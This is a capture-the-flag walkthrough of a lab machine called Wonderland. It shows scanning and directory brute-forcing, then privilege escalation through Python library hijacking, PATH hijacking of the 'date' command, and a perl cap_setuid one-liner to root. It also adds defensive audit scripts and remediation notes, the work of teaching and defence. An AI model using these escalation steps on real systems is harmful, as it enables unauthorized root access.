Wonderland

Fall down the rabbit hole and enter wonderland.

Scanning

Nmap

$ nmap -sV -sC 10.10.59.87       

Starting Nmap 7.60 ( https://nmap.org ) at 2021-10-02 00:02 BST
Nmap scan report for ip-10-10-59-87.eu-west-1.compute.internal (10.10.59.87)
Host is up (0.0012s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:F4:A0:15:1D:53 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds

Enumeration

Gobuster

$ gobuster dir -u http://10.10.59.87 -w /usr/share/wordlists/dirb/big.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.59.87
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/10/02 00:03:13 Starting gobuster
===============================================================
/img (Status: 301)
/poem (Status: 301)
/r (Status: 301)
===============================================================
2021/10/02 00:03:14 Finished
===============================================================

/img and /poem contain nothing interesting (no binaries).

Check /r.

We will reuse the same gobuster command and append each newly found directory to the URL.

In this case we will use an alphabet wordlist.

$ gobuster dir -u http://10.10.59.87/r/ -w alpha.txt
/a
$ gobuster dir -u http://10.10.59.87/r/a -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b -w alpha.txt
/b
$ gobuster dir -u http://10.10.59.87/r/a/b/b -w alpha.txt
/i
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i -w alpha.txt
/t
$ gobuster dir -u http://10.10.59.87/r/a/b/b/i/t -w alpha.txt

That is the end; there is nowhere further to go.

Open http://10.10.59.87/r/a/b/b/i/t in the browser.

View the page source.

Initial Access

SSH to the target using these credentials.

Privilege Escalation

Horizontal Escalation to Rabbit

Check whether alice has any sudo privileges.

alice@wonderland:~$ sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

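alice can run the script walrus_and_the_carpenter.py with rabbit's privileges.

Checking walrus_and_the_carpenter.py shows that the code uses the Python library random.

Python searches the script's own directory before the standard library when importing, and the script lives in alice's home directory, so let's hijack this library.

For more background, see the Python library hijack article.

Create a fake library with the same name.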

alice@wonderland:~$ echo "import os
os.system('/bin/bash')" > random.py

run walrus_and_the_carpenter with rabbit privilege

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ 
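The same import-shadowing behaviour can be checked for before a script is granted a sudoers entry. The audit below is an added example, not part of the original write-up: it lists standard-library imports that a file sitting beside the script would override. The file name poem_demo.py and the sample script contents are constructed for the demo.

```python
import ast
import os
import sys
import sysconfig
import tempfile

def is_stdlib(mod):
    """True if `mod` ships with this interpreter."""
    known = getattr(sys, "stdlib_module_names", ())  # Python 3.10+
    lib = sysconfig.get_paths()["stdlib"]            # fallback: stdlib directory
    return (mod in known or mod in sys.builtin_module_names
            or os.path.exists(os.path.join(lib, mod + ".py"))
            or os.path.isdir(os.path.join(lib, mod)))

def imported_modules(script_path):
    """Top-level module names imported anywhere in the script."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def shadowed_stdlib(script_path):
    """Stdlib imports overridden by a file beside the script (sys.path[0])."""
    script_dir = os.path.dirname(os.path.abspath(script_path))
    hits = []
    for mod in sorted(imported_modules(script_path)):
        local = (mod + ".py", os.path.join(mod, "__init__.py"))
        if is_stdlib(mod) and any(
                os.path.exists(os.path.join(script_dir, p)) for p in local):
            hits.append(mod)
    return hits

def demo():
    """Constructed sample: a script importing random, then random.py beside it."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "poem_demo.py")  # hypothetical file name
        with open(script, "w") as fh:
            fh.write("import random\nfrom os import path\nprint(random.random())\n")
        before = shadowed_stdlib(script)
        open(os.path.join(d, "random.py"), "w").close()  # empty stand-in module
        return before, shadowed_stdlib(script)

if __name__ == "__main__":
    print(demo())
```

Running the sudo-permitted script with python3 -I (isolated mode) keeps the script's directory off sys.path, and keeping the script in a directory the invoking user cannot write to closes the same gap.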

Horizontal Escalation to Hatter

Check the home directory; the teaParty binary is here.

Run it.

It seems to trigger the date command, which is looked up through PATH.

  • Write the command you want to execute to a file with the same name.

  • Prepend that file's directory to the PATH variable.

  • Run the script.

rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date 
rabbit@wonderland:/home/rabbit$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ pwd
/home/rabbit
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$ chmod 777 date 
rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami
hatter

In this directory you can find password.txt.

Log in over SSH as hatter.
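The lookup that made this work, and the two fixes on the program's side (call the command by absolute path, and hand child processes a fixed PATH the way sudo's secure_path does in the sudo -l output earlier), are shown in this added example, which is not part of the original write-up. The directory layout, SAFE_PATH value and helper names are constructed for the demo.

```python
import os
import tempfile

SAFE_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"  # fixed value, never inherited

def is_exec(p):
    """Regular file with an execute bit set (approximates the kernel's check)."""
    return os.path.isfile(p) and bool(os.stat(p).st_mode & 0o111)

def resolve(cmd, path):
    """First executable named `cmd` on `path`, the way execvp() searches."""
    if "/" in cmd:  # a name containing a slash is used as-is, PATH is ignored
        return cmd if is_exec(cmd) else None
    for entry in path.split(":"):
        candidate = os.path.join(entry or ".", cmd)  # empty entry means cwd
        if is_exec(candidate):
            return candidate
    return None

def child_env(inherited, keep=("LANG", "TZ")):
    """Environment a privileged helper should pass to the commands it runs."""
    env = {k: v for k, v in inherited.items() if k in keep}
    env["PATH"] = SAFE_PATH
    return env

def demo():
    """Constructed layout: a 'bin' and a user-writable 'home', both holding date."""
    with tempfile.TemporaryDirectory() as root:
        system, user = os.path.join(root, "bin"), os.path.join(root, "home")
        for d in (system, user):
            os.mkdir(d)
            target = os.path.join(d, "date")
            with open(target, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(target, 0o755)
        caller = {"PATH": user + ":" + system, "TZ": "UTC", "HOME": user}
        bare = resolve("date", caller["PATH"])                          # by name
        pinned = resolve(os.path.join(system, "date"), caller["PATH"])  # absolute
        return (os.path.basename(os.path.dirname(bare)),
                os.path.basename(os.path.dirname(pinned)),
                child_env(caller))

if __name__ == "__main__":
    print(demo())
```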

Vertical Escalation to Root

Check file capabilities.

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

Perl has cap_setuid+ep set, so it can change its UID to 0.

Check GTFOBins.

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
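The getcap output above can be triaged automatically during a host audit. This added example, not part of the original write-up, parses getcap output and flags high-risk capabilities, rating them critical when the binary is an interpreter. The capability and interpreter lists are an illustrative selection, and the last sample line is constructed.

```python
import re

# Capabilities that allow becoming root or bypassing file permission checks.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
             "cap_fowner"}
# Binaries that execute code given on the command line (illustrative list).
INTERPRETER = re.compile(r"^(perl|python|ruby|php|node|lua|gdb|vim|tclsh)[\d.]*$")
# Older libcap prints "path = caps"; newer releases drop the " = " separator.
LINE = re.compile(r"^(?P<path>/\S+)\s+(?:=\s+)?(?P<caps>.+)$")
CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")

def audit(getcap_output):
    """Return (path, risky capabilities, level) for each worrying getcap line."""
    findings = []
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        risky = set()
        for clause in m.group("caps").split():
            c = CLAUSE.match(clause)
            if c and "p" in c.group("flags"):  # permitted set: usable at exec
                risky |= set(c.group("names").split(",")) & HIGH_RISK
        if risky:
            name = m.group("path").rsplit("/", 1)[-1]
            level = "critical" if INTERPRETER.match(name) else "review"
            findings.append((m.group("path"), sorted(risky), level))
    return findings

# The three lines from the getcap run above, plus one constructed line in the
# newer output format (the /opt path is hypothetical).
SAMPLE = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
/opt/backup/agent cap_dac_read_search,cap_net_raw=ep
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

For a flagged binary that does not need the capability, setcap -r followed by the file path removes it.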

Last updated 3 years ago